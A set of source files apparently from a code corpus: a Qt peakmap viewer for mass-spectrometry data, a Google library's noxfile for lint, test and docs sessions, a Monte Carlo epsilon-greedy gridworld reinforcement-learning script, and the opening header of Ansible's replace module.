self.rtmax = min(rtmax, self.peakmap_range[1])
self.mzmin = max(mzmin, self.peakmap_range[2])
self.mzmax = min(mzmax, self.peakmap_range[3])
self.update_image_limits(self.rtmin, self.rtmax, self.mzmin, self.mzmax)
def update_image_limits(self, rtmin, rtmax, mzmin, mzmax):
rtmin = max(rtmin, self.peakmap_range[0])
rtmax = min(rtmax, self.peakmap_range[1])
mzmin = max(mzmin, self.peakmap_range[2])
mzmax = min(mzmax, self.peakmap_range[3])
self.set_plot_limits(rtmin, rtmax, mzmin, mzmax, "bottom", "right")
self.set_plot_limits(rtmin, rtmax, mzmin, mzmax, "top", "left")
self.replot()
self.emit(SIG_PLOT_AXIS_CHANGED, self)
def get_coords(self, evt):
return self.invTransform(self.xBottom, evt.x()), self.invTransform(self.yLeft, evt.y())
def get_items_of_class(self, clz):
for item in self.items:
if item.__class__ == clz:
yield item
def get_unique_item(self, clz):
items = set(self.get_items_of_class(clz))
if len(items) == 0:
return None
if len(items) != 1:
raise Exception("%d instance(s) of %s among CurvePlots items !" % (len(items), clz))
return items.pop()
@protect_signal_handler
def reset_zoom_to_full_map(self, filter_, evt):
rtmin = self.peakmap_range[0]
rtmax = self.peakmap_range[1]
mzmin = self.peakmap_range[2]
mzmax = self.peakmap_range[3]
self.update_image_limits(rtmin, rtmax, mzmin, mzmax)
@protect_signal_handler
def reset_zoom_to_initial_view(self, filter_, evt):
self.update_image_limits(self.rtmin, self.rtmax, self.mzmin, self.mzmax)
@protect_signal_handler
def start_drag_mode(self, filter_, evt):
self.start_at = self.get_coords(evt)
self.moved = False
self.dragging = True
marker = self.get_unique_item(RectangleShape)
marker.set_rect(self.start_at[0], self.start_at[1], self.start_at[0], self.start_at[1])
self.cross_marker.setVisible(False) # no cross marker when dragging
self.rect_label.setVisible(1)
self.with_shift_key = evt.modifiers() == Qt.ShiftModifier
self.replot()
@protect_signal_handler
def move_in_drag_mode(self, filter_, evt):
now = self.get_coords(evt)
marker = self.get_unique_item(RectangleShape)
marker.setVisible(1)
now_rt = max(self.peakmap_range[0], min(now[0], self.peakmap_range[1]))
now_mz = max(self.peakmap_range[2], min(now[1], self.peakmap_range[3]))
marker.set_rect(self.start_at[0], self.start_at[1], now_rt, now_mz)
self.moved = True
self.replot()
def mouseReleaseEvent(self, evt):
# stop drag mode is not called immediatly when dragging and releasing shift
# during dragging.
if self.dragging:
self.stop_drag_mode(None, evt)
@protect_signal_handler
def stop_drag_mode(self, filter_, evt):
stop_at = self.get_coords(evt)
marker = self.get_unique_item(RectangleShape)
marker.setVisible(0)
# reactivate cursor
self.cross_marker.set_pos(stop_at[0], stop_at[1])
self.cross_marker.setZ(self.get_max_z() + 1)
# passing None here arives as np.nan if you call get_rect later, so we use
# np.nan here:
marker.set_rect(stop_at[0], stop_at[1], np.nan, np.nan)
self.dragging = False
if self.moved and not self.with_shift_key:
rtmin, rtmax = self.start_at[0], stop_at[0]
# be sure that rtmin <= rtmax:
rtmin, rtmax = min(rtmin, rtmax), max(rtmin, rtmax)
mzmin, mzmax = self.start_at[1], stop_at[1]
# be sure that mzmin <= mzmax:
mzmin, mzmax = min(mzmin, mzmax), max(mzmin, mzmax)
# keep coordinates in peakmap:
rtmin = max(self.peakmap_range[0], min(self.peakmap_range[1], rtmin))
rtmax = max(self.peakmap_range[0], min(self.peakmap_range[1], rtmax))
mzmin = max(self.peakmap_range[2], min(self.peakmap_range[3], mzmin))
mzmax = max(self.peakmap_range[2], min(self.peakmap_range[3], mzmax))
self.update_image_limits(rtmin, rtmax, mzmin, mzmax)
else:
self.replot()
@protect_signal_handler
def do_zoom_view(self, dx, dy, lock_aspect_ratio=False):
"""
modified version of do_zoom_view from base class,
we restrict zooming and panning to ranges of peakmap.
Change the scale of the active axes (zoom/dezoom) according to dx, dy
dx, dy are tuples composed of (initial pos, dest pos)
We try to keep initial pos fixed on the canvas as the scale changes
"""
# See guiqwt/events.py where dx and dy are defined like this:
# dx = (pos.x(), self.last.x(), self.start.x(), rct.width())
# dy = (pos.y(), self.last.y(), self.start.y(), rct.height())
# where:
# * self.last is the mouse position seen during last event
# * self.start is the first mouse position (here, this is the
# coordinate of the point which is at the center of the zoomed area)
# * rct is the plot rect contents
# * pos is the current mouse cursor position
auto = self.autoReplot()
self.setAutoReplot(False)
dx = (-1,) + dx # adding direction to tuple dx
dy = (1,) + dy # adding direction to tuple dy
if lock_aspect_ratio:
direction, x1, x0, start, width = dx
F = 1 + 3 * direction * float(x1 - x0) / width
axes_to_update = self.get_axes_to_update(dx, dy)
axis_ids_horizontal = (self.get_axis_id("bottom"), self.get_axis_id("top"))
axis_ids_vertical = (self.get_axis_id("left"), self.get_axis_id("right"))
for (direction, x1, x0, start, width), axis_id in axes_to_update:
lbound, hbound = self.get_axis_limits(axis_id)
if not lock_aspect_ratio:
F = 1 + 3 * direction * float(x1 - x0) / width
if F * (hbound - lbound) == 0:
continue
if self.get_axis_scale(axis_id) == 'lin':
orig = self.invTransform(axis_id, start)
vmin = orig - F * (orig - lbound)
vmax = orig + F * (hbound - orig)
else: # log scale
i_lbound = self.transform(axis_id, lbound)
i_hbound = self.transform(axis_id, hbound)
imin = start - F * (start - i_lbound)
imax = start + F * (i_hbound - start)
vmin = self.invTransform(axis_id, imin)
vmax = self.invTransform(axis_id, imax)
# patch for not "zooming out"
if axis_id in axis_ids_horizontal:
vmin = max(vmin, self.peakmap_range[0])
vmax = min(vmax, self.peakmap_range[1])
elif axis_id in axis_ids_vertical:
vmin = max(vmin, self.peakmap_range[2])
vmax = min(vmax, self.peakmap_range[3])
self.set_axis_limits(axis_id, vmin, vmax)
self.setAutoReplot(auto)
# the signal MUST be emitted after replot, otherwise
# we receiver won't see the new bounds (don't know why?)
self.replot()
self.emit(SIG_PLOT_AXIS_CHANGED, self)
@protect_signal_handler
def do_pan_view(self, dx, dy):
"""
modified version of do_pan_view from base class,
we restrict zooming and panning to ranges of peakmap.
Translate the active axes by dx, dy
dx, dy are tuples composed of (initial pos, dest pos)
"""
auto = self.autoReplot()
self.setAutoReplot(False)
axes_to_update = self.get_axes_to_update(dx, dy)
axis_ids_horizontal = (self.get_axis_id("bottom"), self.get_axis_id("top"))
axis_ids_vertical = (self.get_axis_id("left"), self.get_axis_id("right"))
for (x1, x0, _start, _width), axis_id in axes_to_update:
lbound, hbound = self.get_axis_limits(axis_id)
i_lbound = self.transform(axis_id, lbound)
i_hbound = self.transform(axis_id, hbound)
delta = x1 - x0
vmin = self.invTransform(axis_id, i_lbound - delta)
vmax = self.invTransform(axis_id, i_hbound - delta)
# patch for not "panning out"
if axis_id in axis_ids_horizontal:
vmin = max(vmin, self.peakmap_range[0])
vmax = min(vmax, self.peakmap_range[1])
elif axis_id in axis_ids_vertical:
vmin = max(vmin, self.peakmap_range[2])
vmax = min(vmax, self.peakmap_range[3])
self.set_axis_limits(axis_id, vmin, vmax)
self.setAutoReplot(auto)
# the signal MUST be emitted after replot, otherwise
# we receiver won't see the new bounds (don't know why?)
self.replot()
self.emit(SIG_PLOT_AXIS_CHANGED, self)
cursorMoved = pyqtSignal(float, float)
@protect_signal_handler
def do_move_marker(self, evt):
super(ModifiedImagePlot, self).do_move_marker(evt)
rt = self.invTransform(self.xBottom, evt.x())
mz = self.invTransform(self.yLeft, evt.y())
self.cursorMoved.emit(rt, mz)
def get_range(*peakmaps):
rtmins = []
rtmaxs = []
mzmins = []
mzmaxs = []
iimins = []
iimaxs = []
for peakmap in peakmaps:
if peakmap is not None and len(peakmap):
ranges = peakmap.get_ranges()
rtmins.append(ranges[0])
rtmaxs.append(ranges[1])
mzmins.append(ranges[2])
mzmaxs.append(ranges[3])
iimins.append(ranges[4])
iimaxs.append(ranges[5])
if len(rtmins):
return min(rtmins), max(rtmaxs), min(mzmins), max(mzmaxs), min(iimins), max(iimaxs)
return 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
def create_image_widget():
# patched plot in widget
widget = ImageWidget(lock_aspect_ratio=False, xlabel="rt", ylabel="m/z")
# patch memeber's methods:
widget.plot.__class__ = ModifiedImagePlot
widget.plot.set_axis_direction("left", False)
widget.plot.set_axis_direction("right", False)
set_x_axis_scale_draw(widget)
set_y_axis_scale_draw(widget)
widget.plot.enableAxis(widget.plot.colormap_axis, False)
return widget
class LabeledPolygonShape(QwtPlotItem):
__implements__ = (IBasePlotItem,)
# we implemented IBasePlotItem because guiqwt manages these objects in a consistent way
# although we have to implement many empty methods below for conforming to IBasePlotItem
# API.
def __init__(self, item, label=None):
super(LabeledPolygonShape, self).__init__() # feature.rtmin, feature.rtmax,
# feature.mzmin, feature.mzmax)
self.item = item
self.label = label
# <IBasePlotItem API>
selected = False
do_nothing = lambda *a, **kw: None
set_resizable = set_movable = set_rotatable = set_read_only = set_private = set_selectable\
= select = unselect = set_item_parameters = get_item_parameter\
= move_local_point_to = move_local_shape = move_with_selection = do_nothing
return_false = lambda *a, **kw: False
can_resize = cat_move = can_rotate = is_readonly = is_private = can_select = return_false
def types(self):
return (IShapeItemType,)
def hit_test(self, pos):
return 99999.99, 0, False, None
# </IBasePlotItem API>
# somehow light blue which contasts to the yellow/red/black colors of the peakmap:
color = (170, 220, 255)
def _set_inner_pen_and_brush(self, painter, xMap, yMap):
r, g, b = self.color
pen = QPen(QColor(r, g, b, 255), 1.0)
brush = QBrush()
painter.setPen(pen)
painter.setBrush(brush)
def _set_outer_pen_and_brush(self, painter, xMap, yMap):
r, g, b = self.color
pen = QPen()
brush = QBrush(QColor(r, g, b, 80))
painter.setPen(pen)
painter.setBrush(brush)
def _draw_polygon(self, painter, xMap, yMap, range_tuple):
# range_tuple might contain more then four values !
rtmin, rtmax, mzmin, mzmax = range_tuple[:4]
points = QPolygonF()
points.append(QPointF(xMap.transform(rtmin), yMap.transform(mzmin)))
points.append(QPointF(xMap.transform(rtmin), yMap.transform(mzmax)))
points.append(QPointF(xMap.transform(rtmax), yMap.transform(mzmax)))
points.append(QPointF(xMap.transform(rtmax), yMap.transform(mzmin)))
painter.drawPolygon(points)
return points
def _setup_painter(self, painter):
painter.setRenderHint(QPainter.Antialiasing)
class PeakRangeShape(LabeledPolygonShape):
def draw(self, painter, xMap, yMap, canvasRect):
self._setup_painter(painter)
self._set_inner_pen_and_brush(painter, xMap, yMap)
self._draw_polygon(painter, xMap, yMap, self.item)
if self.label is not None:
self._draw_label(painter, xMap, yMap)
def _draw_label(self, painter, xMap, yMap):
self.text = QTextDocument()
self.text.setDefaultStyleSheet("""div { color: rgb(%d, %d, %d); }""" % self.color)
self.text.setHtml("<div>%s</div>" % (self.label, ))
x0 = xMap.transform(self.item.rtmax)
# y0: height between m0 and m1 masstrace if m1 exists, else at height of m0
y0 = yMap.transform(0.5 * self.item.mzmin + 0.5 * self.item.mzmax)
h = self.text.size().height()
painter.translate(x0, y0 - 0.5 * h)
self.text.drawContents(painter)
class FeatureShape(LabeledPolygonShape):
def draw(self, painter, xMap, yMap, canvasRect):
self._setup_painter(painter)
self._set_outer_pen_and_brush(painter, xMap, yMap)
rtmin = self.item.rtmin
rtmax = self.item.rtmax
mzmin = self.item.mzmin
mzmax = self.item.mzmax
self._draw_polygon(painter, xMap, yMap, (rtmin, rtmax, mzmin, mzmax))
self._set_inner_pen_and_brush(painter, xMap, yMap)
for mass_trace in self.item.mass_traces:
self._draw_polygon(painter, xMap, yMap, mass_trace)
if self.label is not None:
self._draw_label(painter, xMap, yMap)
def _draw_label(self, painter, xMap, yMap):
self.text = QTextDocument()
self.text.setDefaultStyleSheet("""div { color: rgb(%d, %d, %d); }""" % self.color)
self.text.setHtml("<div>%s</div>" % (self.label, ))
x0 = xMap.transform(self.item.rtmax)
# y0: height between m0 and m1 masstrace if m1 exists, else at height of m0
yi = sorted(m.mzmin for m in self.item.mass_traces)
if len(yi) >= 2:
y0 = yMap.transform(0.5 * yi[0] + 0.5 * yi[1])
else:
y0 = yMap.transform(yi[0])
h = self.text.size().height()
painter.translate(x0, y0 - 0.5 * h)
self.text.drawContents(painter)
class PeakmapPlotter(QWidget):
def __init__(self, parent):
super(PeakmapPlotter, self).__init__(parent)
self.layout = QGridLayout(self)
self.widget = create_image_widget()
self.image_item = None
self.extra_items = []
sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.widget.setSizePolicy(sizePolicy)
left, top, right, bottom = 0, 0, 0, 0
self.widget.setContentsMargins(left, top, right, bottom)
self.layout.setContentsMargins(left, top, right, bottom)
self.layout.addWidget(self.widget, 0, 0, 1, 1)
self.widget.plot.cursorMoved.connect(self.marker_moved)
self.clear()
def clear(self):
pm = PeakMap([])
self.set_peakmaps(pm, None)
cursorMoved = pyqtSignal(float, float)
cursorMovedRt = pyqtSignal(float)
cursorMovedMz = pyqtSignal(float)
def marker_moved(self, rt, mz):
self.cursorMoved.emit(rt, mz)
self.cursorMovedRt.emit(rt)
self.cursorMovedMz.emit(mz)
def plot_feature(self, peakmap, feature, hit):
self.set_peakmaps(peakmap, None, [(feature, hit.aa_sequence)])
self.widget.plot.set_initial_image_limits(feature.rtmin - 30.0, feature.rtmax + 30.0,
feature.mzmin - 10.0, feature.mzmax + 10.0)
def plot_mass_trace(self, peakmap, rtmin, rtmax, mzmin, mzmax, aa_sequence):
item = PeakRange(rtmin, rtmax, mzmin, mzmax)
self.set_peakmaps(peakmap, None, [(item, aa_sequence)])
self.widget.plot.set_initial_image_limits(rtmin - 10.0, rtmax + 10.0, mzmin - 3.0,
mzmax + 3.0)
def set_peakmaps(self, peakmap, peakmap2, extra_items=None):
self.peakmap = peakmap
self.peakmap2 = peakmap2
# only makes sense for gamma, after reload imin/imax and rt/mz bounds will not be
# valid any more
if peakmap2 is not None:
pass
#self.image_item = RGBPeakMapImageItem(peakmap, peakmap2)
else:
self.image_item = PeakMapImageItem(peakmap)
self.widget.plot.peakmap_range = get_range(peakmap, peakmap2)
self.widget.plot.del_all_items()
self.widget.plot.add_item(self.image_item)
if extra_items is not None:
for item, label in extra_items:
if isinstance(item, Feature):
self.widget.plot.add_item(FeatureShape(item, label))
if isinstance(item, PeakRange):
self.widget.plot.add_item(PeakRangeShape(item, label))
# widget.plot.reset_history()
self.create_peakmap_labels()
# for zooming and panning with mouse drag:
t = self.widget.add_tool(SelectTool)
self.widget.set_default_tool(t)
t.activate()
# for selecting zoom window
t = self.widget.add_tool(PeakmapZoomTool)
t.activate()
def move_marker_to_rt(self, rt):
__, mz = self.cross_marker.get_pos()
self.cross_marker.set_pos(rt, mz)
self.replot()
def create_peakmap_labels(self):
plot = self.widget.plot
rect_marker = RectangleShape()
rect_label = make.info_label("TR", [PeakmapCursorRangeInfo(rect_marker)], title=None)
rect_label.labelparam.label = ""
rect_label.setVisible(1)
plot.rect_label = rect_label
plot.add_item(rect_label)
params = {
"shape/drag/symbol/size": 0,
"shape/drag/line/color": "#cccccc",
"shape/drag/line/width": 1.5,
"shape/drag/line/alpha": 0.4,
"shape/drag/line/style": "SolidLine",
}
CONF.update_defaults(dict(plot=params))
rect_marker.shapeparam.read_config(CONF, "plot", "shape/drag")
rect_marker.shapeparam.update_shape(rect_marker)
rect_marker.setVisible(0)
rect_marker.set_rect(0, 0, np.nan, np.nan)
plot.add_item(rect_marker)
plot.canvas_pointer = True # x-cross marker on
# we hack label_cb for updating legend:
def label_cb(rt, mz):
# passing None here arives as np.nan if you call get_rect later, so we use
# np.nan here:
rect_marker.set_rect(rt, mz, np.nan, np.nan)
return ""
cross_marker = plot.cross_marker
cross_marker.label_cb = label_cb
params = {
"marker/cross/line/color": "#cccccc",
"marker/cross/line/width": 1.5,
"marker/cross/line/alpha": 0.4,
"marker/cross/line/style": "DashLine",
"marker/cross/symbol/marker": "NoSymbol",
"marker/cross/markerstyle": "Cross",
}
CONF.update_defaults(dict(plot=params))
cross_marker.markerparam.read_config(CONF, "plot", "marker/cross")
cross_marker.markerparam.update_marker(cross_marker)
self.cross_marker = cross_marker
self.rect_marker = rect_marker
def clear_plot(self):
self.widget.plot.del_all_items()
self.replot()
def replot(self):
self.widget.plot.replot()
def __getattr__(self, name):
return getattr(self.widget.plot, name)
def get_plot(self):
return self.widget.plot
def paint_pixmap(self):
return self.image_item.paint_pixmap(self.widget)
def set_processing_parameters(self, parameters):
self.image_item.set_processing_parameters(parameters)
self.replot()
class PeakMapExplorer(QDialog):
def __init__(self, parent=None):
super(PeakMapExplorer, self).__init__(parent)
self.setWindowFlags(Qt.Window)
self.setAttribute(Qt.WA_DeleteOnClose)
self.setWindowFlags(Qt.Window)
def keyPressEvent(self, e):
if e.key() != Qt.Key_Escape:
super(PeakMapExplorer, self).keyPressEvent(e)
def setup(self, peakmap, peakmap2=None, extra_items=None):
self.setup_widgets_and_layout()
self.connect_signals_and_slots()
self.setup_peakmap_plotter(peakmap, peakmap2, extra_items)
self.setup_processing_parameters()
self.plot_peakmap()
def connect_signals_and_slots(self):
self.params.paramsChanged.connect(self.peakmap_plotter.set_processing_parameters)
def setup_processing_parameters(self):
self.params.setup_initial_values(gamma_min=0.05,
gamma_max=10.0,
gamma_start=4.0,
log_scale=True,
imin=self.imin,
imax=self.imax)
def setup_peakmap_plotter(self, peakmap, peakmap2, extra_items):
self.peakmap = peakmap # .getDominatingPeakmap()
self.dual_mode = peakmap2 is not None
self.peakmap2 = peakmap2
if self.dual_mode:
self.peakmap2 = peakmap2.getDominatingPeakmap()
(self.rtmin, self.rtmax, self.mzmin, self.mzmax,
self.imin, self.imax) = get_range(peakmap, peakmap2)
# jparam = PeakMapProcessingParameters(self.params.gamma_start, True, 0, self.imax)
# self.peakmap_plotter.set_processing_parameters(param)
def plot_peakmap(self):
# includes replot:
self.peakmap_plotter.update_image_limits(self.rtmin, self.rtmax, self.mzmin, self.mzmax)
def setup_widgets_and_layout(self):
sizePolicy = QSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())
self.setSizePolicy(sizePolicy)
self.gridLayout = QGridLayout(self)
self.splitter = QSplitter(self)
self.splitter.setOrientation(Qt.Horizontal)
self.peakmap_plotter = PeakmapPlotter(self.splitter)
self.verticalLayoutWidget = QWidget(self.splitter)
self.verticalLayout = QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.params = PeakMapScalingParameters(self.verticalLayoutWidget)
sizePolicy = QSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.params.sizePolicy().hasHeightForWidth())
self.params.setSizePolicy(sizePolicy)
self.verticalLayout.addWidget(self.params)
spacerItem = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.MinimumExpanding)
self.verticalLayout.addItem(spacerItem)
self.gridLayout.addWidget(self.splitter, 0, 0, 1, 1)
def inspectPeakMap(peakmap, peakmap2=None, extra_items=None, table=None, modal=True, parent=None):
"""
allows the visual inspection of a peakmap
"""
app = guidata.qapplication() # singleton !
win = PeakMapExplorer(parent=parent)
win.setup(peakmap, peakmap2, extra_items)
if modal:
win.raise_()
win.exec_()
else:
win.show()
if __name__ == "__main__":
from ivi.lib.compress_io import CompressedDataReader
print "open"
dr = CompressedDataReader("/Users/uweschmitt/data/dose/collected.ivi")
print "opened"
for base_name in dr.get_base_names():
print base_name
pm = dr.fetch_peak_map(base_name)
if pm.spectra:
print "data loaded from", base_name
hits = dr.get_hits_for_base_name(base_name)
features = []
for i, hit in enumerate(hits):
if len(features) < 50:
for f in dr.fetch_features_for_hit(hit):
features.append(f)
inspectPeakMap(pm, extra_items=features)
break
else:
raise Exception("peakmap is empty")
| apache-2.0 |
googleapis/python-recommendations-ai | noxfile.py | 29 | 6957 | # -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by synthtool. DO NOT EDIT!
from __future__ import absolute_import
import os
import pathlib
import shutil
import nox
BLACK_VERSION = "black==19.10b0"
BLACK_PATHS = ["docs", "google", "tests", "noxfile.py", "setup.py"]
DEFAULT_PYTHON_VERSION = "3.8"
SYSTEM_TEST_PYTHON_VERSIONS = ["3.8"]
UNIT_TEST_PYTHON_VERSIONS = ["3.6", "3.7", "3.8", "3.9"]
CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute()
# 'docfx' is excluded since it only needs to run in 'docs-presubmit'
nox.options.sessions = [
"unit",
"system",
"cover",
"lint",
"lint_setup_py",
"blacken",
"docs",
]
# Error if a python version is missing
nox.options.error_on_missing_interpreters = True
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
session.install("flake8", BLACK_VERSION)
session.run(
"black", "--check", *BLACK_PATHS,
)
session.run("flake8", "google", "tests")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def blacken(session):
"""Run black. Format code to uniform standard."""
session.install(BLACK_VERSION)
session.run(
"black", *BLACK_PATHS,
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint_setup_py(session):
"""Verify that setup.py is valid (including RST check)."""
session.install("docutils", "pygments")
session.run("python", "setup.py", "check", "--restructuredtext", "--strict")
def default(session):
# Install all test dependencies, then install this package in-place.
constraints_path = str(
CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
)
session.install("asyncmock", "pytest-asyncio", "-c", constraints_path)
session.install("mock", "pytest", "pytest-cov", "-c", constraints_path)
session.install("-e", ".", "-c", constraints_path)
# Run py.test against the unit tests.
session.run(
"py.test",
"--quiet",
f"--junitxml=unit_{session.python}_sponge_log.xml",
"--cov=google/cloud",
"--cov=tests/unit",
"--cov-append",
"--cov-config=.coveragerc",
"--cov-report=",
"--cov-fail-under=0",
os.path.join("tests", "unit"),
*session.posargs,
)
@nox.session(python=UNIT_TEST_PYTHON_VERSIONS)
def unit(session):
"""Run the unit test suite."""
default(session)
@nox.session(python=SYSTEM_TEST_PYTHON_VERSIONS)
def system(session):
"""Run the system test suite."""
constraints_path = str(
CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
)
system_test_path = os.path.join("tests", "system.py")
system_test_folder_path = os.path.join("tests", "system")
# Check the value of `RUN_SYSTEM_TESTS` env var. It defaults to true.
if os.environ.get("RUN_SYSTEM_TESTS", "true") == "false":
session.skip("RUN_SYSTEM_TESTS is set to false, skipping")
# Install pyopenssl for mTLS testing.
if os.environ.get("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") == "true":
session.install("pyopenssl")
system_test_exists = os.path.exists(system_test_path)
system_test_folder_exists = os.path.exists(system_test_folder_path)
# Sanity check: only run tests if found.
if not system_test_exists and not system_test_folder_exists:
session.skip("System tests were not found")
# Use pre-release gRPC for system tests.
session.install("--pre", "grpcio")
# Install all test dependencies, then install this package into the
# virtualenv's dist-packages.
session.install("mock", "pytest", "google-cloud-testutils", "-c", constraints_path)
session.install("-e", ".", "-c", constraints_path)
# Run py.test against the system tests.
if system_test_exists:
session.run(
"py.test",
"--quiet",
f"--junitxml=system_{session.python}_sponge_log.xml",
system_test_path,
*session.posargs,
)
if system_test_folder_exists:
session.run(
"py.test",
"--quiet",
f"--junitxml=system_{session.python}_sponge_log.xml",
system_test_folder_path,
*session.posargs,
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.install("coverage", "pytest-cov")
session.run("coverage", "report", "--show-missing", "--fail-under=98")
session.run("coverage", "erase")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docs(session):
"""Build the docs for this library."""
session.install("-e", ".")
session.install("sphinx==4.0.1", "alabaster", "recommonmark")
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-W", # warnings as errors
"-T", # show full traceback on exception
"-N", # no colors
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docfx(session):
"""Build the docfx yaml files for this library."""
session.install("-e", ".")
session.install(
"sphinx==4.0.1", "alabaster", "recommonmark", "gcp-sphinx-docfx-yaml"
)
shutil.rmtree(os.path.join("docs", "_build"), ignore_errors=True)
session.run(
"sphinx-build",
"-T", # show full traceback on exception
"-N", # no colors
"-D",
(
"extensions=sphinx.ext.autodoc,"
"sphinx.ext.autosummary,"
"docfx_yaml.extension,"
"sphinx.ext.intersphinx,"
"sphinx.ext.coverage,"
"sphinx.ext.napoleon,"
"sphinx.ext.todo,"
"sphinx.ext.viewcode,"
"recommonmark"
),
"-b",
"html",
"-d",
os.path.join("docs", "_build", "doctrees", ""),
os.path.join("docs", ""),
os.path.join("docs", "_build", "html", ""),
)
| apache-2.0 |
HerdOfBears/Learning_Machine_Learning | Reinforcement Learning/monte_carlo_epsilon_greedy.py | 1 | 4207 |
import numpy as np
from reinforcement.gridworld import standard_grid, negative_grid
from reinforcement.iterative_policy_eval import print_policy, print_IPE_result
ALL_POSSIBLE_ACTIONS = ["U","D","R","L"]
GAMMA = 0.9
def reverse(lst):
# input: list
# output: the reverse of the list
temp_list = []
L = len(lst)
for i in range((L-1),-1,-1):
temp_list.append(lst[i])
return temp_list
def sample_mean(lst):
n = len(lst)
tot = sum(lst)
x_bar = (1.0/n)*tot
return x_bar
def eps_greedy(s, Q, policy):
epsilon = 0.1
random_num = np.random.rand()
if random_num <= epsilon:
policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)
return policy
else:
max_Q = float("-inf")
max_A = policy[s]
for tup in Q.keys():
if tup[0] == s:
if Q[(s,tup[1])] > max_Q:
max_Q = Q[(s,tup[1])]
max_A = tup[1]
policy[s] = max_A
return policy
def play_episode(policy):
# start --> tuple: (s, a), s is a tuple (i,j). So, ( (i,j), a )
global g
#random_start = list(g.actions.keys())[np.random.choice(len(g.actions.keys()))]
#random_action = np.random.choice(ALL_POSSIBLE_ACTIONS)
epsilon = 0.1
p = np.random.rand()
if p <= epsilon:
temp_start1 = np.random.choice(ALL_POSSIBLE_ACTIONS)
start = ((2,0),temp_start1)
else:
start = ((2,0),policy[(2,0)])
g.set_state(start[0])
s0 = g.current_state()
a0 = start[1]
states_actions_and_rewards = [(s0,a0,0)]
prev_s = s0
prev2_s = None
s = g.current_state()
action = a0
seen_states = [s0]
# NOTE:
# r(t) refers to the reward acquired from performing a(t-1) in state s(t-1)
while True:
prev_s = s
r = g.move(action)
s = g.current_state()
# print("prev_s = ", prev_s, " s = ", s," action = ", action)
if g.game_over():
states_actions_and_rewards.append((s,None,r))
break
else:
random_num = np.random.rand()
if random_num <= epsilon:
action = np.random.choice(ALL_POSSIBLE_ACTIONS)
else:
action = policy[s]
states_actions_and_rewards.append((s,action,r))
seen_states.append(s)
# Game is over. Now compute the actual return.
G = 0
states_actions_and_returns = []
# Start at the last state and reward because the return is calculated
# from the final to the initial state
# (it depends on the reward of the final state)
first = True
for s,a,r in reversed(states_actions_and_rewards):
if first:
first = False
else:
states_actions_and_returns.append((s,a,G))
G = r + GAMMA*G
states_actions_and_returns.reverse()
return states_actions_and_returns
def monte_carlo_ES(P,N,Q):
# P --> policy
# N --> Number of iterations
# Q --> state-value function
global g
states = g.all_states()
returns = {}
for s in g.all_states():
if s not in g.actions:
continue
for a in ALL_POSSIBLE_ACTIONS:
returns[(s,a)] = []
deltas = []
biggest_change = 0
for i in range(N):
# states_actions_returns is a list of 3-tuples [(s,a,G)];
# the state, the action taken, and the return
seen_before = []
states_actions_returns = play_episode(P)
print("Iteration = ",i)
for s,a,G in states_actions_returns:
if (s,a) not in seen_before:
seen_before.append((s,a))
old_Q = Q[(s,a)]
returns[(s,a)].append(G)
Q[(s,a)] = sample_mean(returns[(s,a)])
biggest_change = max(biggest_change, np.abs(old_Q - Q[(s,a)]))
deltas.append(biggest_change)
# Update the policy using epsilon greedy method.
for s in P.keys():
max_Q = float("-inf")
prev_P = P[s]
max_a = P[s]
# Get the argmax[a]{ Q(s,a) }
for tup in Q.keys():
if s == tup[0]:
a = tup[1]
if Q[(s,a)]>max_Q:
max_Q = Q[(s,a)]
max_a = a
P[s] = max_a
return P,Q
def main():
global g
g = negative_grid()
#g = standard_grid()
global gamma
gamma = 0.9
states = g.all_states()
# initialize the action-value function and a random policy
Q = {}
policy={}
for s in states:
if s in g.actions:
for a in ALL_POSSIBLE_ACTIONS:
Q[(s,a)] = 0#np.random.rand()
policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)
else:
pass
optimal_policy,Q = monte_carlo_ES(policy, 5000, Q)
print_policy(optimal_policy,g)
for s in g.actions:
print('s=',s,' ',Q[s,optimal_policy[s]])
print(Q[(2,3),"L"])
| mit |
cchurch/ansible | lib/ansible/modules/files/replace.py | 38 | 10934 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2013, Evan Kaufman <evan@digitalflophouse.com
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
